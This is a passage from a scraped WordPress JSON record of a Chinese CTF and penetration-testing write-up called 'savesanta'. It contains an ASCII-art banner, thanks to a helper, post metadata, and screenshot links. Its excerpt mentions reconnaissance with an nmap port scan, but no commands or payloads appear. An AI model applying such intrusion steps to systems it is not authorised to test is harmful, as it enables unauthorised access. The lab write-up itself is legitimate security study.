@@@@@o@@@@@OOo@@@@@@@OOOO'oOO@@@@@@@@Oo@@@@@@@@@@@@O@@@@@@@@Oo@@@@@@@@@@@@a\n`@@@@@@@O@@@OOOo`OOOOOOO'oOO@@@@@@@@@O@@@@@@@@@@@@@@@O@@@@@@@@Oo@@@@@@@@@@@@\n `@@@@@OO@@@@@OOOooooooooOO@@@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@@@@@Oo@@@@@@oO@@@@\n `@@@OO@@@@@@@@@@@@@@@@@@@O@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@@@@@O@@@@@@@oO@@@'\n `@@`O@@@@@@@@@@@@@@@@@@@Oo@@@@@@@@@@@@@@@@@@@@@@Oo@@@@@@@@@@@@@@@O@@@'\n `@ @@@@@@@@@@@@@@@@@@@OOo@@@@@@@@@@@@@@@@@@@@@O@@@@@@@@@@@@@@@'@@'\n `@@@@@@@@@@@@@@@@@@OOo@@@@@@@@@@@@@@@@@@@@O@@@@@@@@@@@@@@@ a'\n `@@@@@@@@@@@@@@OOo@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@@@@@@'\n `@@@@@@@@@@@Oo@@@@@@@@@@@@@@@@@@@@@@@@@Oo@@@@'\n `@@@@@@Oo@@@@O@@@@@@@@@@@@@@@@@@@'o@@'\n `@@@@@@@@oO@@@@@@@@@@@@@@@@@ a'\n `@@@@@oO@@@@@@@@@@@@@@' '\n '@@@o'`@@@@@@@@'\n @' .@@@@'\n @@'\n @'\n<\/code><\/pre>\n\u540c\u65f6\u8fd8\u611f\u8c22[mikannse]()\u5e08\u5085\u63d0\u7684\u610f\u89c1:<\/p>\n
<\/div><\/p>\n(\u8fd9\u6837\u7684\u8bdd\u4e0d\u5c31\u767d\u6a21\u7cca\u4e86\u3002\u3002\u3002\u3002\u3002)<\/p>\n","protected":false},"excerpt":{"rendered":"
savesanta \u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a \u770b\u6837\u5b50\u5e94\u8be5\u662f\u7684\u4e86\uff0c\u5f00\u59cb\u5165\u624b\u3002 \u4fe1\u606f\u641c\u96c6 \u626b\u63cf\u5f00\u653e\u7aef\u53e3 nmap […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-427","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/427","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=427"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/427\/revisions"}],"predecessor-version":[{"id":428,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/427\/revisions\/428"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=427"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=427"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=427"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240320132439826\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453902.png\")
<\/div><\/p>\n![\"image-20240320134116416\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453904.png\")
<\/div><\/p>\n![\"image-20240320133247463\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453905.png\")
<\/div><\/p>\n![\"image-20240320134225529\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453906.png\")
<\/div><\/p>\n![\"image-20240320134417753\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453907.png\")
<\/div><\/p>\n![\"image-20240320135157399\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453908.png\")
<\/div><\/p>\n![\"image-20240320135625158\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453909.png\")
<\/div><\/p>\n![\"image-20240320140923834\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453910.png\")
<\/div><\/p>\n![\"image-20240320141446367\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453911.png\")
<\/div><\/p>\n![\"image-20240320144905939\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453912.png\")
<\/div>![\"image-20240320144701752\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201453913.png\")
<\/div><\/p>\n![\"image-20240320145547626\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403201456822.png\")
<\/div><\/p>\n